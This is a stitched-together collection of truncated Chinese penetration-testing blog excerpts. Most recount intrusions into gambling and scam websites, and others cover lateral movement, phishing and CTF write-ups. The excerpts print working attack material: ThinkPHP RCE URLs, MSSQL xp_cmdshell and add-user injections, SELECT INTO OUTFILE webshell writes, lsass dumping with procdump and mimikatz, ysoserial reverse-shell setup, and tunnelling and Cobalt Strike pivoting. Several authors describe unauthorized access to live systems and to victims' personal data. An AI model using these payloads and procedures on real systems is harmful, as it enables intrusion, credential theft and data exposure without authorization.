红队攻击面相关讨论

1、偶然间发现一个菠菜站点，遂测试一番，思路如下：既然是菠菜站，肯定会让用户注册，否则怎么收钱了？注册这种和用户强交互的页面，可能存在的漏洞如下： sql注入：用户输入的账号信息，如果不经过滤直接用来写入或查询数据库，肯定存在sql注入xss：在输入框输入的个人信息，大概率会被展示在用户的页面；同时管理员肯定有权限在后台查看用户的个人信息，这里可能会有存储型xss；就算是反射型或DOM型xss，由于这类站点有客服，可以想办法诱骗客户点击链接，达到偷cookie或其他目的；平行越权：用户登陆时、登陆后查看某些页面，此时抓包，如果有类似id字段，通过更改id号可能能看到其他用户、甚至管理员的信息CSRF：修改账号信息，比如密码；或则修改邮箱，再通过邮箱修改密码；支付漏洞：抓包改参数，造成0元支付2、顺着这个思路，不管三七二之一，先上工具试试注册页面，结果如下：发现2个高危的xss； （1）先看第二个：把提示的参数换成检测工具的payload后，页面如下：自己的payload居然被完整的在页面展示，没有任何过滤，高兴死我了； 由于payload本身就在JS内部，所以刚开始并未构造script标签，而是直接用类似 '19736%0a',}%0aalert(666);%0a' 这种payload，目的是让alert(666)直接暴露在后台原有的script标签里，但反复尝试了好多个都不行，只能调整思路，重新构造script标签，这次成功，如下；说明这个xss没误报； 另一个是cookie里面的，把sess…

今天在浏览网页时突然发现了一个菠菜站，网站截图我就不发了 都说菠菜站做的比较安全不容易渗透，今天闲来无事就搞了一下。结果只是扫一下端口我的ip都被ban了。这就有点难过了，只能挂代理再看看。 浏览发现这个站应该不是菠菜主站，而是类似一个办理各种活动的旁站。并且在其中一个活动弹窗中发现了惊喜 这里居然可以上传sfz，那不意味着可能存在文件上传漏洞吗？在信息搜集的时候知道了这个服务器是IIS7.5的 前段时间刚好复习了解析漏洞，所以就试一试是否存在该漏洞 将php的大马做成图片马进行上传 从响应结果来看上传成功了，并且还返回了地址。接着就来访问一下 可以看到确实解析成功了，但是遗憾的是不能正常使用。所以接着直接将php大马的后缀改为jpg进行上传 再次访问发现可以正常使用了，进去一看居然里面还有很多人的个人信息和转账截图。不得不说菠菜害人啊。 既然有了webshell了，那么就先看看当前的权限吧 真是难搞额，又一次碰到了低权限。先不考虑提权，继续看看有没有其他敏感文件可利用的。在各种目录下翻找半天终于找到了数据库的配置文件，显示如下 赶紧连接数据库看看 发现了疑似管理员的账户和密码，试了试这个是能够解密出来的，运气还不错 接下来就登录后台看看 结果大失所望，原本以为会有各种用户的信息和资金流之类的。都到了这一步了，只能继续了。就在一边苦逼想思路怎么提权一边感叹菠菜站确实不是浪得虚名的时候，居然在某个文件夹下面发现了服务器的资料文件 注意看这个文件名——“服务器资料”。可真是瞌睡了有人送枕头。从这里知道这个站应该是基于宝塔搭建的，并账户和密码都…

无意间发现一个thinkphp的菠菜站，最近tp不是刚好有个漏洞吗？ 然后就顺手测试了一下，但过程并不太顺利，不过最后还是拿下了，所以特发此文分享下思路。 0x00 一键getshell简单看了下，应该有不少人玩吧？ 正好前几天写了个测试工具，先掏出来测试一发。 工具显示存在漏洞 一键getshell，看起来很顺利的样子，哈哈。 但是...小明甩了下头发，发现事情并不简单。 菜刀连接的时候，返回500错误。 我们用火狐的hackbar验证下,没毛病啊，那为什么菜刀连接不上呢？ 作为菜逼的我不禁陷入了沉思... 0x01 开始分析因为这个工具我自己写的，从上面getshell的图片中发现调用的是第三个exp，那么我们来分析下看看。 poc如下 /?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=dir 我们在poc后面输入whoami看看权限。 /?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami iis权限 但是可以执行部分命令，比如echo dir等等。 0x02 尝试突破拿shell既然可以执行echo 那么我们可以来尝试写入个小马试试，如果成功的话，再利用小马上传大马，说干就干，苦活来了，我们得一行一行写入进去…

信息收集 正准备开干，有人企鹅私聊我让我跟他赚大钱。 群发也就算了，都开始私聊了，现在不法分子猖狂到什么地步了，这能惯着它。。。京东卡先放放，打开前台是个博彩论坛。 随手一个login，后台出来了，网站是php的，常用口令试了几次，admin存在，密码错误。 放在云悉上看一下。 访问一下子域名，很僵硬。 再看看端口吧，3306开放，主机是Windows的。 收集完毕，框架没扫出来，几乎没啥进展，唯一的突破点就是后台和端口了。 登录后台 3306抱着尝试心态爆破试试，不出意外，mysql没出来。 top100后台爆破试了一下没出来，希望不大，翻找js，可能会有口令，敏感路径，特殊接口什么，但是真的干干净净，可能我看的不仔细。 没有其他突破点，只能再爆破后台试一下了，拿了个大字典，真的跑了超久，最后总算出来了，铁头娃在世。用的字典是人名缩写、年份、特殊字符给搞出来了。 坎坷上传 后台论坛文章管理处看见编辑器，瞬间两眼放光。 允许单图片、多图片尝试上传。 裂开了，白名单限制。 各种截断绕过失败。 看看是什么编辑器，翻找js文件，得知为wangeditor编辑器。 网上搜了一下，这个编辑器好像没什么漏洞，思路已干~ 转折出现 继续翻翻找找，发现订单详情也可下载订单图片。 下载链接： http://www.xxx.com/…

fastJson全版本Docker漏洞环境(涵盖1.2.47/1.2.68/1.2.80等版本)，主要包括JNDI注入、waf绕过、文件读写、反序列化、利用链探测绕过、不出网利用等。设定场景为黑盒测试，从黑盒的角度覆盖FastJson深入利用全过程，部分环境需要给到jar包反编译分析。 Docker环境 docker compose up -d 若docker拉取环境缓慢，请尝试使用国内镜像 https://www.runoob.com/docker/docker-mirror-acceleration.html 环境启动后，访问对应ip的80端口： 总结了一些关于FastJson全版本常用漏洞利用Poc,可搭配食用：Fastjson全版本检测及利用-Poc 环境使用后请销毁,否则可能会冲突：docker compose down 整理一下靶场顺序：(根据利用特点分成三个大类) FastJson 1.2.471247-jndi 1247-jndi-waf 1247-waf-c3p0 1245-jdk8u342 FastJson 1.2.681268-readfile 1268-jkd11-writefile 1268-jdk8-writefile 1268-writefile-jsp 1268-writefile-no-network 1268-jdbc 1268写文件利用另外写了一篇，可搭配使用：FastJson1268写文件RCE探究 FastJson 1.2.801280-groovy 1283-serialize 每个机器根目…

0X00 事情起因 大街上偶遇预存话费3999送平板被套路，支付宝被一顿操作又套现又转账的把我花呗都套走了。 回到家越发越觉得不对劲，越发越后悔，网上一搜关于这类的活动一抓一大把而且一模一样越看是越生气啊。 最主要的呢，送的平板也是八百多的根本不值预存话费的这个价，且居然有卡死的现象，于是乎我决定深挖瞧瞧。 0X01 信息收集 通过验证短信发过来的短域名链接复制到浏览器解析得到网址xx.xxxx.xx好家伙这网址一看就不是移动官方旗下的,在通过站长工具查询该网址解析到阿里云且未启用cdn，该域名持有者系广东一家某科技公司，域名到今年11月份就到期了，在通过搜索该企业发现经营异常这四个大字，我这好几千的话费肯定是凉透了。 通过对得到的域名用nmap -p 1-65355 xx.xxxx.xx进行全端口扫描瞧瞧都开放了哪些服务，再从其服务进行入手，可以看到也就只有80跟22端口，唯一有用的信息就是22端口知道对方是Linux服务器的。 在通过对80端口访问web服务得到以下信息，这界面也是短信内容里短域名所跳转过来的界面。 它的URL形式是/admin/user/login明显的用户登陆界面，众所周知admin是管理的意思，直觉让我逐层递减目录访问，果不其然跳转到了admin/login的商家管理界面。 0X02 漏洞挖掘目前初步找出两个登陆界面，后台登陆是没有验证码的可进行爆破操作，但前提条件是知道商家的手机号，这里就先正常登陆我自己的用户瞧瞧里面有无可利用的地方，功能很简单并无可利用的地方头像处也无法进行编辑上传等操…

0x00 前言我们的小团队对偶然发现的bc站点进行的渗透,从一开始只有sqlmap反弹的无回显os-shell到CS上线,到配合MSF上传脏土豆提权,到拿下SYSTEM权限的过程,分享记录一下渗透过程 0x01 登录框sql注入看到登录框没什么好说的,先试试sqlmap一把梭 burp抓包登录请求,保存到文件直接跑一下试试 python3 sqlmap.py -r "2.txt"有盲注和堆叠注入 看看能不能直接用sqlmap拿shell python3 sqlmap.py -r "2.txt" --os-shell目测不行 提示的是xp_cmdshell未开启,由于之前扫出来有堆叠注入,尝试运用存储过程打开xp_cmdshell Payload: userName=admin';exec sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure'xp_cmdshell', 1;RECONFIGURE;WAITFOR DELAY '0:0:15' --&password=123延时15秒,执行成功(如果没有堆叠注入就把每个语句拆开一句一句执行,效果理论上应该是一样的) 顺便试试看直接用xp_cmdshell来加用户提权,构造payload(注意密码别设太简单,windows系统貌似对密码强度有要求,设太简单可能会失败) userName=admin';exec xp_cmdshell 'net user cmdshell Test ZjZ0…

0x00 信息搜集朋友给了我一个站，算一个比较大的bc，主站看了一下，没有入口，就换了他的一个推广平台 然后首先大致扫了一下目录，希望可以看见一些有用的东西。 这个时候我可以推荐大家一个接口，可以快速大致看看他重要的文件 https://scan.top15.cn/web/infoleak 例如探针，网站源码是否打包，很明显我没有扫出来，然后给大家看看扫描结果。 config.inc.php根据经验看应该是数据库的配置文件，但是大小为0B,试探性的访问一下，果然什么都没有 upload访问就是403，但是根据经验还是会再去扫一下它，说不定是什么fck编辑器呢，也很遗憾，啥子都没有扫到。 /index.php/login/ ，大小只有2kb，也根本不是后台，有点失落。 端口的话也只有这一个web资产，只好看一下他的网站功能了。 然后点击了一下查询，希望可以在这里找找注入。 0x01 后台注入 果然，有注入，剩下的就是找后台了。 查看当前数据库，and (extractvalue(1,concat(0x7e,(select database()),0x7e)))-- 这里记一下踩坑，account=1') and (extractvalue(1,concat(0x7e,(select database()),0x7e)))--(' 这是完整的payload，最开始我的payload为account=1') and (extractvalue(1,concat(0x7e,(select database()),0x7e)))-…

主站注册可以发现jsp和php后缀共存，应该是不同路由反代了不同的中间件，找不到啥漏洞。 论坛是Discuz! X3.2 发现Discuz急诊箱。 admin.php 403，uc_server和急诊箱均无弱密码。 在《渗透某盗版游戏网站》中我介绍了Discuz后台有什么漏洞，那么前台漏洞呢？主要有任意文件删除，SSRF，uc_server爆破。 首先是任意文件删除。 POST /home.php?mod=spacecp&ac=profile&op=base birthprovince=../../../info.php 然后再POST文件上去，即可删除info.php <formaction="https://x.com/home.php?mod=spacecp&ac=profile&op=base"method="POST" enctype="multipart/form-data"> <input type="file"name="birthprovince" id="file" /> <input type="text"name="formhash" value="017b5107"/> <input type="text"name="profilesubmit" value="1"/> <input type="submit"value="Submit" /></from>这个漏洞虽然危害…

0X00 事情由来 了解完事情的经过，经过我的经验判断，这应该是个杀猪诈骗案例 诈骗份子通过一些手段让受害人相信，通过他们可以赚钱并诱导充值杀猪盘赌博 0X01 渗透过程-大概二十分钟左右就拿下了渗透过程简单枯燥： 看了一眼IP和端口，判断了下应该不存在云waf，直接开始扫目录 过了几分钟扫到一个http://xxxx.com.cn/u.php，原来是upupw的集成环境，如下图 思路，爆破phpmyadmin，或者找upupw的默认数据库密码，先找默认密码试试看 成功用系统提供的密码登录，默认的是：DRsXT5ZJ6Oi55LPQ成功登录phpmyadmin 然后尝试getshell，由于有upupw探针，直接查看了phpinfo，有网站的绝对路径，直接尝试常规写shell 需要知道绝对路径、数据库root权限、数据库有写权限具体语句：SELECT "<?php eval(@$_POST['xx']);?>" INTO OUTFILE "D:\\wap\\member_bak.php"注意点：windows下，须要双反斜线，否则会转义然后使用菜刀/蚁剑等链接即可由于当时没有截图，目前网站已经打不开了，所以下面就直接放出拿到shell后的状态了 渗透结束，看了下权限，是system权限，不过咱们的目标是定位诈骗分子的IP信息和位置信息，接着下一步了 0X02 定位诈骗份子的IP和端口拿到shell了就容易的多了，找后台登录的php文件插入xss代码即可 找了一圈发现，后台登录是另外一个网站…

做了不少qp（棋牌），BC渗透了，通宵了2个晚上干了几个盘子，简略的说下过程，做一下总结。 首先说一下qp， 以我的渗透成功案例来说的话首先信息收集必不可少的，qp的特点是什么呢？ 他的后台会在服务器域名的后面以不同的端口形式架设 如图： 关于端口可以发现，基础东西你们都懂。 切入点： 在app里面抓包，查找邮箱，充值，的地方寻找sql注入或者意见反馈的位置XSS 有一种情况是抓包显示127.0.0.1的 抓不到包的情况，这种情况多于大盘子，它不一定走的是TCP UDP协议。可以参考 T-ice 表哥说的 Proxifier全局代理 有了后台之后可以目录fuzz一下，有些管理员会有备份的习惯没准能有新发现。 相对来说qp还是挺简单的。 那么来说说BC吧，看个昨晚的渗透的案例。 基本上大型的BC盘子都是各种防护+cdn 标配，毕竟别人赚了那么多钱也不在乎这点设备钱。。。。 注册了个号 发现没地方能打XSS的。。。。。作罢 因为这种大盘子服务一般是挺到位的，牌面这块方方面面给你整的很高大上，什么导航啊，什么积分商城啊。。 乱七八糟的应有具有，在他主站一个VIP查询页面确定了一处sql注入，而且是thinkphp的框架 thinkphp3.2.3的 ，因为有CDN不知道真实IP，所以后台是个很麻烦的事情，本想着看看数据库里面的log有没有啥发现 没啥鸟用。。尝试读取日志文件，没有。 最后读取配置文件确定了一个很脑残的事情。。。 可能通宵了之后人的脑子有点僵。 我给忘了这种BC后台肯定都是分离的。。。。嗨。少熬夜。 于是。…

0x00 前言去年逛微步，本来是想找几个ip练练溯源能力，无意间发现了一个杀猪盘。本文打马赛克如果有漏的地方请及时指出，也请各位不要去微步上边找我这个目标复现，本case已全权交由某官方处理。 0x01 简单的打点 打开链接一看，一股子浓浓的“微盘”气息扑面而来，由于我们自己审计过这套源码，所以就直接找对应的地方打了个xss，结果呢他这竟然是微盘三开，没错，三开！ 无奈之下还是用老思路，想办法让框架报错，看版本号，走一遍rce。 得到版本号和物理路径，其实还有个小细节，可以看下图。 这里有个SERVER_NAME和SERVER_ADDR，之前打同类项目的时候遇到过一个情况，通过让页面报错反馈出来的这俩信息里可能会带着真实ip，如果在找不到目标真实ip的情况下可以试试这个小技巧。 大家都知道，这种目标，其他的旁站，端口什么的收集都没啥卵用，所以我也不赘述了。 注册个账号上去看了看，也没啥能利用的点，这时候呢突然想起了goods/pid这里有一处注入，由于之前都是用我们自己的day打，所以从来没用过这个注入点，这不今天就来试了试。 bingo！这就很奈斯了，知道物理路径那不就可以传shell了？不，并不可以，权限不够。 但是你看我发现了啥呢！ database的信息莫名其妙显示出来了，这不就可以直接连了？？显然是不可以的，因为没法外连。。。。。 0x02 直冲云霄了属于是大概僵持了十分钟，你看看我发现了啥。 adminer哈哈哈，这是咋发现的呢，之前提到过这套系统的一开，二开我们都审计过，在某些特定目录会有这么一个adminer数…

前言lsass.exe（Local Security Authority Subsystem Service进程空间中，存有着机器的域、本地用户名和密码等重要信息。如果获取本地高权限，用户便可以访问LSASS进程内存，从而可以导出内部数据（password），用于横向移动和权限提升。通过lsass转储用户密码或者hash也算是渗透过程中必不可少的一步，这里学习一下原理以及记录下多种转储方法。 [toc] 常规方法mimikatz::logonpasswords我们通常将这些工具称为LOLBins，指攻击者可以使用这些二进制文件执行超出其原始目的的操作。 我们关注LOLBins中导出内存的程序。 白名单工具三个微软签名的白名单程序 Procdump.exe SQLDumper.exe createdump.exe Procdump转储Lsass.exe的内存ProcDump是微软签名的合法二进制文件，被提供用于转储进程内存。可以在微软文档中下载官方给出的ProcDump文件 用Procdump 抓取lsass进程dmp文件， procdump64.exe -accepteula -ma lsass.exe lsass_dump 然后可以配置mimikatz使用 sekurlsa::Minidump lsassdump.dmp sekurlsa::logonPasswords 如果对lsass.exe敏感的话，那么还可以配合lsass.exe的pid来使用 procdump64.exe -accepteula -ma pid lsass_d…

前言昨天半夜看到一篇文章 某菠菜网站渗透实战 就想着自己也练一练手，打到一半发现，大师傅们对这类站点已经狠狠的蹂躏了，所以借鉴师傅们的经验，本着锻炼一下，想到哪就记一下，所以写的比较杂乱，其中有没有解决的地方也记录下来的，然后又换了个站点接着走了下去 信息收集前台这样 看一下其他的信息 端口查询 80为主页面 81 82 为后台登录界面 1433 mssql 目录扫描 存在目录遍历 漏洞发掘先去后台页面 输入用户名：123提示用户不存在 输入用户名：admin提示用户或密码不正确 确认admin账号，且没有验证码验证，可尝试爆破 直接弱密码 admin 123456 进入后台 功能不多，利用点也没什么 重新回到登录处进行sql注入 mssql，dba权限，直接–os-shell 这里第一台机器不出网且没回显，放弃了，找了几个站终于找到一个出网且回显的网站(只要出网就挺好解决的) CS上线这里尝试CS，判断出网直接生成powershell上线 看一下信息，查一下tasklist 目前是数据库权限，尝试提权，结果直接打掉线，网站也打不开了，还是要慎用，做足信息收集，做足补丁信息的收集 又换了一个站点：找到网站路径 先拿个webshell 哥斯拉顺手甜土豆提权为 system CS插件甜土豆也提权成功 抓一下管理员密码 logonpasswords 付费的 加个影子账户，管理员权限 公网CS通过frp转到内网MSF先上文章吧 FRP+CS实现本地Kali收Shell 服务端（这里为5000，改完忘截图了） 客户端 MSF开启监听 C…

一.前言最近听说用某qipai产品建的站存在SQL注入，刚好别人发来一个 渗透惯用套路一把梭 信息收集 -> 漏洞探测/利用 -> 提权/权限维持 -> 清理痕迹 二.信息收集浏览器访问主页初步发现 系统：Windows server中间件 IIS7.5语言：ASPX 端口扫描 nmap -sV -T4 -p- 11x.xx.xxx.xx开放的端口真不少 其中web服务的有几个：80(当前主页)、81、82、88、47001 81：是这个qipai站的后台 82：也是个后台，不知道是什么系统的后台，有验证码 88/47001：访问失败 1433：数据库 mssql 还开了 139、445但是被过滤了，不知道是不是有防火墙，后面再看 敏感目录扫描 先用 Dirsearch 过一遍，前面搜集到网站语言是 aspx，加上 -e 指定语言 python dirsearch.py -u http://11x.xx.xxx.xx -e aspx再用 7kbscan 过一遍，毕竟这里面收集的都是国人常用的字典 /m/是用户注册页面，可能有用，先记着 /test.html是调起微信的入口，没啥用，可能是在手机端引导受害者聊天的吧 查IP 北京某个运营商的服务器，菠菜在国内服务器建站挺大胆的 信息整理 估计就是个人建的小站，不去展开收集更过的东西了，免得打偏浪费时间 三.漏洞探测重点先放在前面找到的 81 端口，也就是网站的后台管理页面 没有验证码，用户名 / 密码随便写个 admin / admin，抓包 用户名加了个引号发送请求直接…

因为这个站是几个月前日的了，所以图片可能不全，也没办法再补图。 写这篇文章的时候，隔壁情侣正在鼓掌，声音贼响，导致我写的东西可能没有过一遍脑子，写的可能有点混乱。另外值得一提的是，为啥我们做安全的经常隔壁碰到这种人？ 已知目标网站 之前客户有给过这种网站，所以我记忆尤深，针对这种站一般你可以直接放弃正常测试流程了，因为经验告诉我，网站主站功能基本上很少有漏洞的，只能从旁站下手。 Ctrl+u查看一波没发现有什么存在泄漏的js，回过头发现发现网站右上角有个优惠活动大厅 打开后页面似曾相识 随便点开一个活动，好像可以随便提交文字，没有过滤，我信心满满输入xss，提交，然而两天过去了，并没什么叼用，我当时的心情真是像云像雾又像雨。 然而我又发现下面有个审核进度查询，打开后会让你输入用户名，既然有输入用户名，那应该就是有带入数据库查询，习惯性加了个’点击查询，10秒过去了，没响应，我懵了，输入正常不存在的账号测试，是会弹出记录的，但是加单引号查询却一点响应都没有。 F12-network抓包，发现是有发送请求的，很明显了，有注入，而且报错是页面是thinkphp，从最下角看版本是3.2.3，这个版本真的是hc的最爱，从色情到贷款平台，再到菠菜都是这个版本的thinkphp。 先注入一波试试 抓包Sqlmap一波拿到了管理员账号密码，突然我意识到，我没有后台地址，拿到了也没叼用。 Fofa一波得到真实ip，发现999端口存在phpmyadmin服务，6588有一个标题为护卫神丶主机大师的asp站。目录爆破，端口扫描，子域名挖掘，都没有找…

简述 钓鱼是攻防对抗中一种常用的手段，攻击者通常伪装成可信任的实体，例如合法的机构、公司或个人，以引诱受害者揭示敏感信息或执行恶意操作，能快速地撕破目标的伤口，快速进内网进行刷分，投递木马同时需要考虑逃避杀毒软件检测，本篇文章将围绕一些常见的钓鱼手法和木马免杀对抗展开 信息搜集 批量邮箱搜集 https://app.snov.io/ http://www.skymem.info/ 搜索引擎 一般来说，企业邮箱都存在邮件网关，邮件投递容易被退信拦截，所以我们要选择私人邮箱或不被邮服拦截的邮箱： 如 xx举报，xx招聘面对大众的邮箱，相关语法： site:"xxx.com" 举报 site:"xxx.com" 招聘 xx公司举报 @126.com xx公司招聘 @qq.com 钓鱼手法 社工钓鱼 首先是目标选择，目标群体：hr、经理、财务 等安全意识薄弱的人优先选择，提前准备多套场景应对 选择目标公司分部进行钓鱼成功率较高，提前想好话术和应变对策，避免被识破，最好不要在总部，避开IT信息安全部 社牛的师傅可以尝试电话钓鱼，获取信任再添加微信发送木马（需要过人的心理素质和应变能力，之前从潘高工身上学到很多） 邮件钓鱼 群发邮件（不推荐，易被管理员发现或被邮件网关拦截） 搜集关键人物个人邮箱定向投递（推荐，隐蔽性强） 福利补贴发放 紧贴时事话题，使用各种福利活动吸引目标用户点击，把钓鱼链接转为二维码发送 简历投递 招聘投递简历，hr面对大量简历不会仔细查看后缀 钓鱼文案…

0x01 存在一台中转机器存在一台中转机器，这台机器出网，这种是最常见的情况。 经常是拿下一台边缘机器，其有多块网卡，内网机器都不出网。这种情况下拿这个边缘机器做中转，就可以上线。 拓扑大致如下: 上线方法一： SMB Beacon介绍官网介绍：SMB Beacon使用命名管道通过父级Beacon进行通讯，当两个Beacons连接后，子Beacon从父Beacon获取到任务并发送。 因为连接的Beacons使用Windows命名管道进行通信，此流量封装在SMB协议中，所以SMB Beacon相对隐蔽，绕防火墙时可能发挥奇效。 使用这种Beacon要求具有SMB Beacon的主机必须接受端口445上的连接。 派生一个SMB Beacon方法：在Listner生成SMB Beacon>目标主机>右键> spawn >选中对应的Listener>上线 或在Beacon中使用命令spawn smb（smb为我的smb listener名字） 使用插件，或自带端口扫描，扫描内网机器 转到视图，选择目标 使用psexec 选择一个hash，选择smb 监听器和对应会话 即可上线 运行成功后外部可以看到∞∞这个字符，这就是派生的SMB Beacon。 当前是连接状态，你可以Beacon上用link <ip>命令链接它或者unlink <ip>命令断开它。 这种Beacon在内网横向渗透中运用的很多。在内网环境中可以使用ipc $生成的SMB Beacon上传到目标主机执行，但…

获取环境:拉取镜像到本地 启动环境 $ docker run -d -p 80:8080 medicean/vulapps:s_shiro_11.使用shiro_attack_2.2工具对目标系统进行检查，发现有默认key但是无利用链 2.使用shior_tools.jar 直接对目标系统进行检测，检测完毕后会返回可执行操作 java -jar shiro_tool.jar http://10.11.10.108:8081/login.jsp 2、选0让输入dnslog地址，通过dnslog测试有回显，这里有个注意点：使用 http://dnslog.cn/ 部分站点会拦截，可以换多个dnslog平台测试 dnslog有回显接下来就是拿shell了，这里由于固定思维，之前遇到的都是linux系统，先入为主觉得是Linux，结果没利用成功，一开始以为是防火墙拦截，后面探测了一下目录结构，发现是windows，所以这里payload要改变一下 3、在公网VPS上使用ysoserial开启端口，执行反弹命令 java -cp ysoserial-master-30099844c6-1.jar ysoserial.exploit.JRMPListener 1999 CommonsCollections5 "编码后bash命令" 这里面的编码的内容在步骤4 坑一：CommonsCollection1-5 如果不反弹shell，换着使用 4、bash反弹命令编辑 https://x.hacking8.com/…

web ai_java 首先通过附件帐号信件获取到帐号 通过base64或者jsfuck可获取提示js和c，审计一下js那么可以看到c函数，运行一下。获取到 github 项目地址 查找提交历史我们发现了源码 审计源码发现为 可能存在spring–boot 未授权绕过 在admin的页面下的/post_message/接口存在fastjson解析 查看具体版本发现无法直接ladp攻击，查看依赖 发现引入了shiro。使用 SerializedData + LDAP 攻击. 和无依赖 CB 进行反弹 shell public class CB { public static void setFieldValue(Object obj, String fieldName, Objec t value) throws Exception { Field field = obj.getClass().getDeclaredField(fieldName); field.setAccessible(true); field.set(obj, value); } public static Comparator getValue(Object instance) throws NoSuchFiel dException, IllegalAccessException { Class<?> clazz = instance.getClass(); // 获取私有变量的 Field 对象 Field privateFie…

MISC easyfuzz 1、通过尝试输入字符串判断该程序对输入字符的验证规则为9位字符，并且只要满足输入正确字符使最后返回值全部为111111111即可得flag 继续大胆猜测并尝试，发现前两位字符可以为任何字符，都满足110000000，由此可以对后七位字符进行爆破 2、逐位爆破，验证思路正确，最后一位为字符串"d" 3、编写爆破脚本，当字符串长度为9位并输入时，将回显不为“Here is your code coverage: 110000000”的结果打印，脚本如下 from pwn import * from string import printable conn = remote('101.200.122.251', 12199) non_matching_strings = [] for i in range(9): for char in printable: payload = 'a'*i + char + 'a'*(8-i) print(conn.recvuntil(b'Enter a string (should be less than 10 bytes):')) conn.sendline(payload.encode()) response = conn.recvline().decode().strip() if response != "Here is your code coverage:…

1、供应链 在经历了多年的攻防对抗之后，大量目标单位逐渐认识到安全防护的重要性。因此，他们已采取措施尽可能收敛资产暴露面，并加倍部署各种安全设备。但安全防护注重全面性，具有明显的短板效应，一处出现短板，整个防护体系就可能瞬间崩溃。而目标单位的供应链往往是这些薄弱点的集中体现。这些供应链不仅暴露在外，而且由于复杂的关系，使得对它们的监控和管理变得更为困难。因此，攻击团队通常会选择从供应链着手，以一种迂回的方式绕过目标单位强大的防御体系，获得对目标单位的控制权限。 通过在搜索引擎上搜索"系统名称"目标单位 找到相关的供应商信息，通过对供应商进行攻击，获取目标单位的数据及权限。! 1.1、heapdump泄露 通过对供应商资产进行渗透，发现某资产admin目录下存在heapdump文件泄露 对于heapdump的利用方式这里就不太赘述，有许多文章对其原理和利用都进行了深入的研究，特定情况下还可以直接进行RCE，这里泄露了大量敏感信息，密码信息加入密码本 登录MinIO，发现大量所属目标单位的敏感信息，也存在其它单位的敏感信息 登录Nacos，大量配置文件，密码信息加入密码本![] 登录OSS，发现大量所属目标单位的敏感信息 1.2、微信小程序接口未授权 1.2.1、微信小程序解包 想要对微信小程序进行解包操作，首先是要获取目标小程序的wxapkg文件。wxapkg文件是微信小程序的安装包文件格式，用于将小程序的代码、资源以及其他必要的文件打包成一个单独的文件。但是Windows环境下的wxapkg文件…

0x00前言 本来开学正忙于实现电竞梦（联盟高校联赛），某一天下午突然有位师傅联系我说可以免面试进组打省护红队，这么好的实战机会怎么能错过呢～（好好玩游戏，不要学我^^） 0x01 一个出局的企业单位内网之旅 打点一 故事的开始是某佬丢了一个系统nday shell给我 ipconfig发现有10段内网，这种网段内网一般都很大 但是这种nday已经被别人扫烂了 目录全是马 发现不对劲，这是什么？！ 哪位不知名黑客昨天传的fscan 但是目标单位还没出局 先打再说 准备cs上线 但是发现不出网 先在哥斯拉传fcsan命令执行扫了一下b段 (应该先noping稍微扫一下c段再拿一台机器留后路在搞，这次做的有问题，不然流量检测设备检测到了，然后关站就直接寄了) 一堆弱口令➕redis Neo-reGeorg使用 使用Neo-reGeorg正向隧道工具把流量代理出来： Neo-reGeorg是常见的http正向隧道工具，是reGeorg的升级版，增加了内容加密、请求头定制、响应码定制等等一些特性 python3 neoreg.py generate -k xxx --file 404.html --httpcode 404 生成一个webshell密码为xxx 比较有意思的是，工具新增的404模版功能，实战copy目标站点的404html，给到工具之后生成的webshell直接访问是404，对文件隐藏有很好的帮助 上传至目标站点 python3 neoreg.py -k…

前言云平台作为降低企业资源成本的工具，在当今各大公司系统部署场景内已经成为不可或缺的重要组成部分，并且由于各类应用程序需要与其他内外部服务或程序进行通讯而大量使用凭证或密钥，因此在漏洞挖掘过程中经常会遇到一类漏洞：云主机秘钥泄露。此漏洞使攻击者接管云服务器的权限，对内部敏感信息查看或者删除等操作。此篇文章围绕如何发现秘钥泄露、拿到秘钥后如何利用展开。 0X01漏洞概述ak、sk拿到后的利用，阿里云、腾讯云云主机通过使用Access Key Id / Secret Access Key加密的方法来验证某个请求的发送者身份。Access Key Id（AK）用于标示用户，Secret Access Key（SK）是用户用于加密认证字符串和云厂商用来验证认证字符串的密钥，其中SK必须保密。 云主机接收到用户的请求后，系统将使用AK对应的相同的SK和同样的认证机制生成认证字符串，并与用户请求中包含的认证字符串进行比对。如果认证字符串相同，系统认为用户拥有指定的操作权限，并执行相关操作；如果认证字符串不同，系统将忽略该操作并返回错误码。 AK/SK原理使用对称加解密。 0x02秘钥泄露常见场景通过上面描述我们知道云主机密钥如果泄露就会导致云主机被控制，危害很大。 在漏洞挖掘过程中常见的泄露场景有以下几种： 1、报错页面或者debug信息调试。 2、GITHUB关键字、FOFA等。 3、网站的配置文件 4、js文件中泄露 5、源码泄露。APK、小程序反编译后全局搜索查询。 6、文件上传、下载的时候也有可能会有泄露，比如上传图片、上传文档等位置。 …

网上大多数的小程序测试抓包都是用的安卓模拟器，这里使用的是BurpSuite+Proxifer+微信客户端的抓包方式 环境准备 Burp2023.9.2 Proxifier4.5 Proxifier是一款功能非常强大的socks5客户端，可以让不支持通过代理服务器，工作的网络程序能通过HTTPS或socks或代理链。其是收费软件，免费试用31天，这里给一个破解版链接 链接：https://pan.baidu.com/s/14QElyGxDpMBGTuCFTPl4tQ?pwd=7o50 提取码：7o50 安装就无脑next就好了，安装好后打开 点击注册，名字随便写，随便复制一个注册码点击ok即可 Proxifier配置 打开proxifier，点击profile添加一个代理服务器 地址127.0.0.1，端口自定义，我这里是8888，协议选择https 继续添加一条代理规则 在我们用微信打开小程序时，进程里会多出一个WeChatAppEx 这个程序就是微信小程序的进程 添加规则 Applications就选择小程序进程应用（这里可以手动输入），Action就选择刚刚新建的代理服务器 Burp配置 只要编辑代理监听器和proxifier里的代理服务器一样即可，监听127.0.0.1:8888 这时微信打开一个小程序，可以看到WeChatAppEx的流量先经过proxifier，再用过127.0.0.1:8888到burp 现在就可以像平时测试web站点一样的方式在burp里对…